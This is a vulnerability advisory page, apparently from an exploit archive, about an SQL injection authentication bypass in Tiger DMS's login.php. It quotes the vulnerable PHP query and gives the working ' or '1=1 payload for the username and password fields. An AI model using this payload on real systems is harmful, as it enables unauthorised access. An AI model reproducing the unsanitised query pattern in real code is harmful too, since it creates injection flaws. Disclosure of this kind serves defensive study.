Tiger DMS (Auth Bypass) Remote SQL Injection Vulnerability

2009-05-02 / 2009-05-03
Credit: h4ckf0ru
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

============================================================================== DDDDD OOOO SSSS DDDD ZZZZZZ TTTTTTTTT EEEEE A MM MM D D o O S D D Z T E A A M M M M D D o o SSSS [**] D D Z T EEEEE AAAAA M M M D D o o S D D Z T E A A M M DDDD oooO SSSS DDDD ZZZZZZ T EEEEE A A M M ============================================================================== -------------------------------------[+] Home:http://www.tigerdms.com/download.php Product: Tiger DMS home:www.h4ckf0ru.com Note: I test it On Localhost Because ThE Demo is not Worked :) ------------------------------------- Tiger DMS (auth Bypass) SQL Injection Vulnerabilities ------------------------------------- File: ----- Login.php Vuln: ---- if (isset($r_username)){ $selog = mysql_query("SELECT * FROM $prefix"."users where username='$r_username' and password='$r_password'"); $num_rows = mysql_num_rows($selog); if ($num_rows == 1){ $nona=mysql_fetch_array($selog); $_SESSION["aut"] = $nona["type"] ; $_SESSION["nick"] = $nona["username"]; $_SESSION["name"] = $nona["name"]; $_SESSION["id"] = $nona["id"]; header("Location: index.php"); exploit: -------- http://localhost/[path]/login.php username:' or '1=1 Password:' or '1=1 -------------------------------------------------- Greetz to : [+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone- ZoRLu -ViRuS_Dz And ALL Members Of anti-intruders.org ALL My Friends (Dz) [+]-------------------------------------[+]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top